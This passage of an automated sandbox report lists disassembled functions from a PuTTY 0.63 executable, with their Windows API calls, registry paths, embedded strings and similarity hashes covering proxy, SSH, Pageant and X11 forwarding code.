                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448FA2
                            Strings
                            • Unable to create pipes for proxy command, xrefs: 00448FA4
                            • Starting local proxy command: %s, xrefs: 00448F1E
                            • D, xrefs: 00448FF8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseCreateHandlePipe
                            • String ID: D$Starting local proxy command: %s$Unable to create pipes for proxy command
                            • API String ID: 102915730-3171384230
                            • Opcode ID: 28e3e03e1bbcae769a55e0b555d8b9f96b9a04ec4536f9a178d1c63f0d0dacca
                            • Instruction ID: bad2cb629d0ed1777640dc63cd526b87a8987bb29fe41ad2669a6c9d7929842a
                            • Opcode Fuzzy Hash: 28e3e03e1bbcae769a55e0b555d8b9f96b9a04ec4536f9a178d1c63f0d0dacca
                            • Instruction Fuzzy Hash: 7551F871D00208BFDF21AFA6DC85D9FBBB9EF48704F10452AF501A2261DB759A41DBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00449EA6: RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY,?), ref: 00449EE0
                              • Part of subcall function 00449EA6: RegQueryValueExA.ADVAPI32(?,RandSeedFile,00000000,00000001,?,00000001), ref: 00449F05
                              • Part of subcall function 00449EA6: RegCloseKey.ADVAPI32(?), ref: 00449F1E
                              • Part of subcall function 00449EA6: GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00449F6C
                              • Part of subcall function 00446304: CoCreateInstance.OLE32(0046C8B4,00000000,00000001,0046C904,00410EAC,00410EAC,?,00410EAC,?,?,?), ref: 0044631A
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY,?), ref: 0044A416
                            • RegCloseKey.ADVAPI32(?), ref: 0044A42E
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham,?), ref: 0044A43A
                            • RegDeleteKeyA.ADVAPI32(?,PuTTY), ref: 0044A448
                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 0044A45F
                            • RegCloseKey.ADVAPI32(?), ref: 0044A46B
                            • RegOpenKeyA.ADVAPI32(80000001,Software,?), ref: 0044A47D
                            • RegDeleteKeyA.ADVAPI32(?,SimonTatham), ref: 0044A48B
                            • RegCloseKey.ADVAPI32(?), ref: 0044A494
                              • Part of subcall function 0044A380: RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 0044A3DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseOpen$DeleteEnum$AddressCreateInstanceProcQueryValue
                            • String ID: PuTTY$SimonTatham$Software$Software\SimonTatham$Software\SimonTatham\PuTTY
                            • API String ID: 3151532935-144119552
                            • Opcode ID: d5466a432812660022dbbb61529223e5edceede073a5f52ca88cd26865192c12
                            • Instruction ID: 2ad8291588690aaebb20384a85e2454caf31b2d46d5ccb5269286e80e30599f6
                            • Opcode Fuzzy Hash: d5466a432812660022dbbb61529223e5edceede073a5f52ca88cd26865192c12
                            • Instruction Fuzzy Hash: 86115831D40208FBEF11EBA1DD46FAE7B79AF04B55F200076F500A10A1D7759E549B1D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00449B75
                            • _strlen.LIBCMT ref: 00449B83
                            • _strlen.LIBCMT ref: 00449B8D
                              • Part of subcall function 00449B27: _strcat.LIBCMT ref: 00449B2C
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B3D
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B54
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\SshHostKeys,00412E1F), ref: 00449BC7
                            • RegQueryValueExA.ADVAPI32(00412E1F,00000000,00000000,?,00000000,?,?,?,00000001,00000000,?,0041D9AD,?,?,?,?), ref: 00449C05
                            • _strcspn.LIBCMT ref: 00449C3A
                            • RegQueryValueExA.ADVAPI32(00412E1F,?,00000000,?,00000000,?,?,?,?,?,?,?,00000001,00000000,?,0041D9AD), ref: 00449C6B
                            • _strcspn.LIBCMT ref: 00449C9D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$QueryValue_strcspn$Open_strcat
                            • String ID: Software\SimonTatham\PuTTY\SshHostKeys$rsa
                            • API String ID: 4233637586-372324377
                            • Opcode ID: f0adde865e3e6c4d5a6e0b5175e43f2cf585c726d58047edd740d1f801791864
                            • Instruction ID: d164950eb8cc890663b1bf0894168e3683092587b7d8082d924025db078e2c12
                            • Opcode Fuzzy Hash: f0adde865e3e6c4d5a6e0b5175e43f2cf585c726d58047edd740d1f801791864
                            • Instruction Fuzzy Hash: E461B271D04209AFEF159FA5DC81BAFBBB9EF04314F10046BF901A6292E7799E40DB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(?,000003E9,00000190,00000000,00000000), ref: 0043C3D0
                            • SendDlgItemMessageA.USER32(?,000003E9,00000191,00000000,00000000), ref: 0043C3FB
                            • MessageBeep.USER32(00000000), ref: 0043C409
                            • _strlen.LIBCMT ref: 0043C42A
                            • _strlen.LIBCMT ref: 0043C46E
                            • SendDlgItemMessageA.USER32(?,000003E9,00000185,00000000,00000000), ref: 0043C4DB
                            • SetWindowTextA.USER32(?,00000000), ref: 0043C50F
                            • SendDlgItemMessageA.USER32(?,000003E9,00000192,00000002,00000000), ref: 0043C538
                            • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000,00000000), ref: 0043C557
                            • GetParent.USER32(?), ref: 0043C571
                            • SetActiveWindow.USER32(00000000), ref: 0043C578
                            • DestroyWindow.USER32(?), ref: 0043C581
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$ItemSend$Window$_strlen$ActiveBeepDestroyParentText
                            • String ID: %s Event Log
                            • API String ID: 2560716093-583241876
                            • Opcode ID: 45d19d10145400aff0c1653e71e78a4a6cf5eb5c36c6f43b04fa895eefa17954
                            • Instruction ID: 2e356330c53dc0c758c5851041f359bc7b0b19ff5107ced1d053ec69806b6889
                            • Opcode Fuzzy Hash: 45d19d10145400aff0c1653e71e78a4a6cf5eb5c36c6f43b04fa895eefa17954
                            • Instruction Fuzzy Hash: 6851D475500314BFDB109F65DCC5EAE3B69FB08358F10543AFA05AB2A2DB78D941CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreatePen.GDI32(00000000,00000000), ref: 0043F355
                            • SelectObject.GDI32(?,00000000), ref: 0043F365
                            • Polyline.GDI32(?,?,00000005), ref: 0043F372
                            • SelectObject.GDI32(?,00000000), ref: 0043F37C
                            • DeleteObject.GDI32(00000000), ref: 0043F37F
                            • CreatePen.GDI32(00000000,00000000), ref: 0043F3E8
                            • SelectObject.GDI32(00000001,00000000), ref: 0043F3F8
                            • MoveToEx.GDI32(00000001,00000000,00000003,00000000), ref: 0043F406
                            • LineTo.GDI32(00000001,00000001,00000003), ref: 0043F420
                            • SelectObject.GDI32(00000001,?), ref: 0043F42C
                            • SetPixel.GDI32(00000001,00000000,00000003), ref: 0043F450
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                            • String ID: @$@
                            • API String ID: 1020918164-149943524
                            • Opcode ID: db983c29a3bff71a569ec5bd1fb67aea2ad07354bab0f0ad1b00daaa9047c993
                            • Instruction ID: 158a60834a37111c831db5e4307e9cd77ef9cd87de50dbf7fef5036c2c768d41
                            • Opcode Fuzzy Hash: db983c29a3bff71a569ec5bd1fb67aea2ad07354bab0f0ad1b00daaa9047c993
                            • Instruction Fuzzy Hash: 86615A71800249EFDF11CF58DC44AAEBBB5FF48304F15807AF908A62A1D3798A64DF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindWindowA.USER32(Pageant,Pageant), ref: 00448A56
                            • GetCurrentThreadId.KERNEL32 ref: 00448A69
                            • LocalAlloc.KERNEL32(00000040,00000014,?,00000004,?,?), ref: 00448AA2
                            • LocalFree.KERNEL32(00000000,?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00448AE4
                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002000,?), ref: 00448AFB
                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,00000004,?,?), ref: 00448B1B
                            • _strlen.LIBCMT ref: 00448B3A
                            • SendMessageA.USER32(?,0000004A,00000000,?), ref: 00448B53
                            • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?,00000004,?,00000004,?,?), ref: 00448BA3
                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,00000000,?,00000004,?,00000004,?,?), ref: 00448BAC
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 004488A1
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004488BF
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 004488E5
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 0044890B
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00448931
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000004,?,00000004,?,?), ref: 00448BC3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$FileLocal$FreeView$AllocCloseCreateCurrentFindHandleMappingMessageSendThreadUnmapWindow_strlen
                            • String ID: Pageant$PageantRequest%08x
                            • API String ID: 208608764-270379698
                            • Opcode ID: 2ba39d7b3bcf770192401992b35e7b70c7b38d429dd409b5b6948dd89857b78b
                            • Instruction ID: ebb8a2e89abeaa8aa0223dd1f5b74b345cb8dcb75db0a578d36e95a9be23e8d5
                            • Opcode Fuzzy Hash: 2ba39d7b3bcf770192401992b35e7b70c7b38d429dd409b5b6948dd89857b78b
                            • Instruction Fuzzy Hash: 9651B0B0904205AFEB109FA6DC85DAFBBB8FF44305F14406FF511E22A1DB789940CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat$_strrchr$AddressFileFreeLibraryModuleNameProc
                            • String ID: HtmlHelpA$hhctrl.ocx$putty.chm$putty.cnt$putty.hlp
                            • API String ID: 2909541172-2623836457
                            • Opcode ID: 3c97a9e0351280e2cf192f01bb02c5771d26d1062c0a1de6b1a99868926aaff9
                            • Instruction ID: 922ac8fd8dce154ffb209a198d0b63c5704e289720c1fd91b1d3e43fff633d38
                            • Opcode Fuzzy Hash: 3c97a9e0351280e2cf192f01bb02c5771d26d1062c0a1de6b1a99868926aaff9
                            • Instruction Fuzzy Hash: A131D3319047505BFB207FA16CCAAAA3399FB04315F58047FF648E3143EA7C69498B9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                            • API String ID: 3058806289-1673886896
                            • Opcode ID: d2cd47f40433d7fe36d0b6ad18a21b0ab4467e2c9e4f75772f10d7653d290a91
                            • Instruction ID: 8d1c553ab4dd858755cf9880b1e283b05601171f676434bbb1ead8f1a1024395
                            • Opcode Fuzzy Hash: d2cd47f40433d7fe36d0b6ad18a21b0ab4467e2c9e4f75772f10d7653d290a91
                            • Instruction Fuzzy Hash: E5310C71E412147BE711ABA19C42FCE7668AF04318F10446FF915AB183DB7CDE49475E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(user32.dll,0046FC80,?,?,00000000,00470490,00000008,004549CE), ref: 0044F942
                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0044F95E
                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0044F96F
                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0044F97C
                            • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0044F992
                            • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0044F9A3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: $GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                            • API String ID: 2238633743-752805172
                            • Opcode ID: ced9f3315be097a811ab3a554fe62e3ae77f8b5b011789cfd708af97ac7f9746
                            • Instruction ID: 21405082d27aaec33bee693cef50ad4e3cae07fc1aa7d4a10cea6c2141e218df
                            • Opcode Fuzzy Hash: ced9f3315be097a811ab3a554fe62e3ae77f8b5b011789cfd708af97ac7f9746
                            • Instruction Fuzzy Hash: 3B21B671604345AEFB118F749D85B673BA8EB44744B80403BE909D2390EB78D848DB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ShellExecuteA.SHELL32(?,open,http://www.chiark.greenend.org.uk/~sgtatham/putty/,00000000,00000000,0000000A), ref: 0043C64B
                            • EnableWindow.USER32(?,00000000), ref: 0043C663
                            • DialogBoxParamA.USER32(00000071,?,Function_0003C590,00000000), ref: 0043C675
                            • EnableWindow.USER32(?,00000001), ref: 0043C67E
                            • SetActiveWindow.USER32(?), ref: 0043C681
                            • SetWindowTextA.USER32(?,00000000), ref: 0043C6A2
                            • SetDlgItemTextA.USER32(?,000003EA), ref: 0043C6C3
                            • SetDlgItemTextA.USER32(?,000003EB,Release 0.63), ref: 0043C6D2
                            • EndDialog.USER32(?,00000001), ref: 0043C6DE
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Text$DialogEnableItem$ActiveExecuteParamShell
                            • String ID: About %s$Release 0.63$http://www.chiark.greenend.org.uk/~sgtatham/putty/$open
                            • API String ID: 469075849-3246762659
                            • Opcode ID: 9a79417d7be96c7cc9ec3b14a7e3cfcdf33241f5422cb80a7be18f0e89d32167
                            • Instruction ID: 336dbcc97489b208e7a7e42fefce6eb53bce1fd9d8b0f9d9a045658a04007ca6
                            • Opcode Fuzzy Hash: 9a79417d7be96c7cc9ec3b14a7e3cfcdf33241f5422cb80a7be18f0e89d32167
                            • Instruction Fuzzy Hash: 7721D431144204B7DB221F64EC8AFAE3E24EB19B52F105037F505F90F1D7A89981DB8D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$ObjectSelect$CapsDeviceDialogExtentMessageModePointRectReleaseSendText_strcat_strncpy
                            • String ID:
                            • API String ID: 3302912960-0
                            • Opcode ID: 28901d0a8ecffb8d2495b3fbed707c1470b540995435a800e5232994a5356064
                            • Instruction ID: 262e785b3b08c70c4629ce7070e32358f2250a536410bbd531516cb5c9e3fa95
                            • Opcode Fuzzy Hash: 28901d0a8ecffb8d2495b3fbed707c1470b540995435a800e5232994a5356064
                            • Instruction Fuzzy Hash: C751B271805209FFDF009F95EC869BEBBB9FF08315F20006BF911A6291DBB99D419B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1.99$2.0$?A$S$SSH protocol version 1 required by user but not provided by server$SSH protocol version 2 required by user but not provided by server$SSH-$Server version: %s$Using SSH protocol version %d
                            • API String ID: 0-2439925355
                            • Opcode ID: 8ca3135db0e9186eebccfd4cac00502ca2a52af96ea4bb2dae740041ee24bb59
                            • Instruction ID: 6e3529e77a367a1f60e5496eeb96435607e447254fb75afe2229aad41306a309
                            • Opcode Fuzzy Hash: 8ca3135db0e9186eebccfd4cac00502ca2a52af96ea4bb2dae740041ee24bb59
                            • Instruction Fuzzy Hash: 6A9135B4500745EBDB20DF26C809AEB7BA4EF05308F10456FFD5996292DB7C9980CB9E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • Proxy error: SOCKS server wanted IDENTD on client, xrefs: 0040CD3C
                            • Z, xrefs: 0040CD11
                            • Proxy error: unexpected proxy error, xrefs: 0040CD5C
                            • Proxy error: SOCKS proxy responded with unexpected reply code version, xrefs: 0040CD0A
                            • ..\proxy.c, xrefs: 0040CBAD
                            • type == ADDRTYPE_NAME, xrefs: 0040CBB2
                            • Proxy error: Error while communicating with proxy, xrefs: 0040CD2E
                            • Proxy error: Username and IDENTD on client don't agree, xrefs: 0040CD35
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: ..\proxy.c$Proxy error: Error while communicating with proxy$Proxy error: SOCKS proxy responded with unexpected reply code version$Proxy error: SOCKS server wanted IDENTD on client$Proxy error: Username and IDENTD on client don't agree$Proxy error: unexpected proxy error$Z$type == ADDRTYPE_NAME
                            • API String ID: 1497175149-2896027840
                            • Opcode ID: 777a6fa7652b0ae83293e53c6fa6c80eea3c8fe514b0efca323d479fb51e11ed
                            • Instruction ID: 77dbb117b44a6dc2fdf4981727dedc23c7aa012fec282d37bea82a92d5816999
                            • Opcode Fuzzy Hash: 777a6fa7652b0ae83293e53c6fa6c80eea3c8fe514b0efca323d479fb51e11ed
                            • Instruction Fuzzy Hash: 99512671900304FFDB209BA0CCC1E6A7BA8AF05304F104A7BF555A62C2D77CE945879A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • MIT-MAGIC-COOKIE-1 data was wrong length, xrefs: 0044B8BB
                            • MIT-MAGIC-COOKIE-1 data did not match, xrefs: 0044B8D6
                            • XDM-AUTHORIZATION-1 data was wrong length, xrefs: 0044B8EF
                            • ..\x11fwd.c, xrefs: 0044B9DB, 0044BA21
                            • wrong authorisation protocol attempted, xrefs: 0044B8A6
                            • cannot do XDM-AUTHORIZATION-1 without remote address data, xrefs: 0044B8FF
                            • disp->xdmseen != NULL, xrefs: 0044B9E0
                            • XDM-AUTHORIZATION-1 data replayed, xrefs: 0044BA03
                            • XDM-AUTHORIZATION-1 time stamp was too far out, xrefs: 0044B99E
                            • XDM-AUTHORIZATION-1 data failed check, xrefs: 0044B9A8
                            • seen != NULL, xrefs: 0044BA26
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: ..\x11fwd.c$MIT-MAGIC-COOKIE-1 data did not match$MIT-MAGIC-COOKIE-1 data was wrong length$XDM-AUTHORIZATION-1 data failed check$XDM-AUTHORIZATION-1 data replayed$XDM-AUTHORIZATION-1 data was wrong length$XDM-AUTHORIZATION-1 time stamp was too far out$cannot do XDM-AUTHORIZATION-1 without remote address data$disp->xdmseen != NULL$seen != NULL$wrong authorisation protocol attempted
                            • API String ID: 0-1152134572
                            • Opcode ID: af91739d094f9df1fd860f564365c0b1f275028a5c10926c7a140f5f21a7b185
                            • Instruction ID: 6f468527017b88a32592194186e5bfd36f46cb058d9c585d95c6141b7c0fee88
                            • Opcode Fuzzy Hash: af91739d094f9df1fd860f564365c0b1f275028a5c10926c7a140f5f21a7b185
                            • Instruction Fuzzy Hash: B1514871604650AEFB346A799C42B273BD4EB04314F24843FF69AD6682E76CE90483DE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • #15.COMCTL32(?,?,000000FF), ref: 0043A134
                            • SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 0043A148
